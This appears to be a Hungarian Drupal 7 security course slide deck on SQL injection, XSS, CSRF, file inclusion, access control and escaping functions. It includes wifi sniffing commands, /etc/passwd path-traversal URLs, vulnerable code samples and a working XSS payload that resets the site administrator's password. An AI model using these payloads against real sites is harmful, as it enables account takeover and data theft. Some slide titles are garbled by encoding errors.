�ݺ�ߣ

Drupal biztonság

Tuesday, April 3, 12

Ki célpont?


”mi nem vagyunk célpontok”
n Az adatok értékesek (pl.
tematizált email címlista
az {user} táblából)
n A látogatók értékesek
n Minden gép számít
(botnetek)
n Vandálkodni jó :)


Ki célpont?

Mindenki


Biztonságról általában
n
Csak biztonságos és nem
biztonságos oldal van, nincs
félig biztonságos
n
Egy rossz sor kód is elég
ahhoz, hogy bárki bármit
tehessen az oldalunkkal /
szerverünkkel
n
A webfejlesztő is programozó,
ugyanúgy kell nekünk is
törődnünk a biztonsággal,
mint annak, aki az amerikai
védelmi hivatalnak fejleszt.

Hálózati biztonság

n Titkosított protokollok használata (FTP és HTTP (feltöltés)
kerülendő)
n Wi-Fi esetén WPA titkosítás
n Total Commander nem jelszómegőrző


Így hallgathatlak le téged


Bárki lehallgathat

n Nem csak a képzett ”crackerek”
sudo ifconfig wlan0 down

sudo iwconfig wlan0 mode monitor

sudo ifconfig wlan0 up

sudo wireshark


�ѱ𲵴Ǳ��á��ǰ�
n SSL-lel titkosított protokollok használata:
n FTPS
n SFTP
n HTTPS
n SSH
n VPN


��á��í��á��ǰ�
n
FastCGI (DDoS ellen jobb)
n
PHP
n
suhosin használata
n
php.ini
n
open_basedir
n
disabled_functions
n
disabled_classes
n
safe_mode kikapcsolása (hamis biztonságérzet, gyakorlatban
nem sokat véd)

Formok biztonsága

n a hidden (és bármilyen más) mezők tartalmai ugyanúgy
módosíthatóak a felhasználók által! (meglepően sok oldal
törhető így)
n szerencsére ezt a form api kivédi


Formok biztonsága

n Bizonyos érzékeny adatok (pl.: bankkártya szám) beviteli
mezőjénél az autocomplete=”off” attribútum használata


HTTP kérések
n Írás soha ne legyen GET
n Létrehozás, szerkesztés az POST (form miatt), de a törlés is
legyen az!
n Nem árt, ha rákérdezünk a felhasználóra törlés előtt
(Drupalban: conﬁrm_form() függvény)
n Ha bejut valamilyen bot, akkor a linkeken végigmegy →
ha ez egy admin felület, akkor törölheti az összes
tartalmat

HTTP kérések

n Érzékeny adatot URL-ben soha
n http://example.com/register.php?
username=foo&password=bar&mail=foobar@example.com


JavaScript

n A JavaScript által végzett ellenőrzés csak kényelmi
szolgáltatás, minden ellenőrzést el kell végezni a szerver
oldalon is!


JavaScript
n Valós életből vett ellenpélda:
<script language="javascript">

</script>

File inclusion

n File-t SOHA nem include-olunk URL alapján
n Triviális példa:
http://example.com/index.php?p=../../../../etc/
passwd
http://example.com/index.php?p=index.php


Alapok

n Soha, de soha ne nyúljunk a core kódhoz!


Alapok

n Használjuk a Drupal függvényeit és API-jait
n Nálunk tapasztaltabb emberek írták
n Könnyű megtanulni őket
n Hosszú távon úgyis gyorsabban végezzük el a
feladatainkat


Alapok
n Minimális jogosultságok mindenkinek
n A következő jogosultságok megadásával odaadjuk a
siteunkat:
n Administer content types
n Administer users
n Administer permissions
n Administer ﬁlters
n Administer site conﬁguration

Input formats

n Amit csak nagyon megbízható felhasználóknak engedünk:
n Full HTML
n PHP


Access control

n Használd:
n node_access
n user_access
n hook_menu


hook_menu()
n 'access callback'
n ezzel a függvénnyel ellenőrzi a Drupal, hogy az
adott felhasználó jogosult-e az oldal megnézésére
n alapértelmezett érték: user_access
n 'access arguments'
n egy tömb, ami paraméterként adódik át
n user_access esetén elég egy elem, a jogosultság
neve

hook_menu()
n
Rossz példa:
function hook_menu() {
return array(
'foobar' => array(
'access callback' => TRUE,
),
);
}

hook_menu()
n Még egy rossz példa
return array('foobar' => array(
'access callback' => user_access('some
permission'),
));
}


hook_menu()
n
Jó példa

function hook_perm() { return array('do sg with my module'); }


return array( 'foobar' => array(

'access arguments' => array('do sg with my module'),

));

}


Valamit csinálni akarunk egy másik user
nevében
n
Rossz példa

global $user;

…

$user = user_load(1);
n
Rossz példa

global $user;

...

$user->uid = 1;


Valamit csinálni akarunk egy másik user
nevében
n Jó példa
global $user;
…
drupal_save_session(FALSE);
$user = user_load(1);
n Ha nem muszáj a jelenlegi userre hivatkozni, akkor ne
használjuk az user változót

SQL injection

n Nem megfelelően kezelt
sztring beillesztése SQL
lekérésbe
n Mindig kritikus hiba


SQL injection

n mysqli_query(”SELECT * FROM node WHERE nid =
” . $_GET['nid']);

n Ez ilyesztő


SQL injection

n mysqli_query(”SELECT * FROM node WHERE nid =
” . $_REQUEST['nid']);

n Ez még ilyesztőbb


SQL injection

n mysqli_query($_REQUEST['searchQuery']);

n Ez talán a legrémesebb.
n Van ilyen: Google ”inurl:SELECT inurl:FROM inurl:WHERE”


SQL injection

n Nem SQL injection, de sok kezdő fejlesztő beleszalad
n SELECT * FROM ”user” WHERE ”name” LIKE '%
$username%'


Feltöltött fájlok
n Mindig ellenőrizni:
n méret
n kiterjesztés
n felbontás (képek esetén)
n ﬁle_check_location()
n Lehetőleg soha ne include-oljunk felhasználó által feltöltött
fájlt

CSRF

<img src=/slideshow/drupal-kurzus-security-drupal-7/12268208/”http:/drupal.org/logout”/>


CSRF

n Cross-site request forgery


�ѱ𲵱��ő��é��
n
Ahol lehet, ott form api-t használni
n
token használata
n
hozzáadás:
$token = drupal_get_token('foo');
l($text, ”some/path/$token”);
n
ellenőrzés:
function my_page_callback($args, $token) {
if(!drupal_valid_token($token, 'foo'))
drupal_access_denied();
else {
...
}
}

XSS

n Cross site scripting


XSS példa

n Node címek listázása saját theme függvénnyel:
$output = '<li>' . $node->title . '</li>';

return $output;

n Mi van, ha a node címe a következő?
'<script>alert(”U R H4XXD LULZ”);
</script>'


XSS

n Nem csak vicces dialógusok feldobálásra való
n Bármit megtehetünk, amit az adott bejelentkezett
felhasználó megtehet.


��é��岹
$.get(Drupal.settings.basePath + 'user/1/edit',
function (data, status) {
if (status == 'success') {
var payload = {
"name": data.match(/id="edit-name" size="[0-9]*" value="([a-z0-9]*)"/)[1],
"mail":
data.match(/id="edit-mail" size="[0-9]*" value="([a-z0-9]*@[a-z0-9]*.[a-z0-9]*)"/)[1],
"form_id": 'user_profile_form',
"form_token":
data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9]*)"/)[1],
build_id:
data.match(/name="form_build_id" id="(form-[a-z0-9]*)" value="(form-[a-z0-9]*)"/)[1],
"pass[pass1]": 'hacked', "pass[pass2]": 'hacked'
};
$.post(Drupal.settings.basePath + 'user/1/edit', payload);
}
}
);


��é��é��
n ”Csak” escape-elni kell
n htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
n de nem szabad elfelejteni
n nem kellene többször megcsinálni
n abban a szövegben sem lesz markup, ahol kellene
lennie


�ʰ��ǲ��é��á��

n A környezet más értelmet ad a jeleknek
I CAN HAZ <b>CHEEZBURGER</b> LULZ!
<b> is not deprecated
<span attribute=”$foo”>$bar</span>


�ѱ𲵴Ǳ��á��ǰ�

n check_plain()
n check_markup()
n check_url()
n ﬁl�ٱ��()
n t()


check_plain()

n plain text környezet:
n html környezet:


check_markup()
n Rich text környezet
[#8] foobar n baz

n HTML környezet
<p> <a href=”http://drupal.org/node/8”> node/8
</a> foobar <br /> baz </p>

check_url()

n URL környezet
http://asdf.com/?foo=42&bar=baz
n HTML környezet
http://asdf.com/?foo=42&bar=baz


ﬁl�ٱ��()

n Felhasználó által adott HTML
<p>foo</p><script>alert('bar');</script>
n Biztonságos HTML
<p>foo</p>alert('bar');


ﬁl�ٱ��()

<img src=/slideshow/drupal-kurzus-security-drupal-7/12268208/”abc.jpg” onmouseover=”...” />
<img src=/slideshow/drupal-kurzus-security-drupal-7/12268208/”abc.jpg” />


ﬁl�ٱ��()

<img src=/slideshow/drupal-kurzus-security-drupal-7/12268208/”javascript:doSomethingBad()” />
<img src=”doSomethingBad()” />


Mi mit vár
n HTML n
Sima szöveg
n checkboxes #options n
select #options
n radios #options
n
l()
n l()
n drupal_set_title
n drupal_set_message
n watchdog


Mi mit vár

n HTML
n site mission
n slogan
n footer


Mi mit vár

n Sima szöveg
n termek
n felhasználónevek
n tartalomtípusok
n node név


Mi mit vár

n Rich text
n comment body
n node body


t()
n Plain text → HTML
n t('@var', array('@var' => $plain_text));
n @: plain text
n t('%var', array('%var' => $plain_text));
n %: kiemelt szöveg
n HTML → HTML
n t('!var', array('!var' => $html));

.htaccess

n Nagyon fontos fájl!
n Ha nincs ott, akkor könnyen okozhat sebezhetőséget
n pl.: directory listing + backup a settings.php-ről


Példák sebezhetőségekre

n Webshopnál az áru mennyisége nem ”1”, hanem ”.1”
n Webshop: ár eltárolása hidden mezőben, átírva 0-ra ingyen
lehet rendelni


Példák sebezhetőségekre

n Sütiben felhasználónév vagy userid eltárolása
n Sok oldalnál nyitvahagyják a memcache portját (11211),
így a cache-elt adatok könnyedén manipulálhatók.


További olvasnivaló
n http://acko.net/blog/safe-string-theory-for-the-web
n http://drupal.org/writing-secure-code
n http://drupal.org/security-team
n http://owasp.org
n http://crackingdrupal.com
n http://api.drupal.org


recruitment@pronovix.com

Belga-magyar cég
Közép-Európa egyik legjobb csapata
<15 fő
Utazás, csoki, sör


�ݺ�ߣ

Drupal kurzus security (Drupal 7)

More Related Content

Drupal kurzus security (Drupal 7)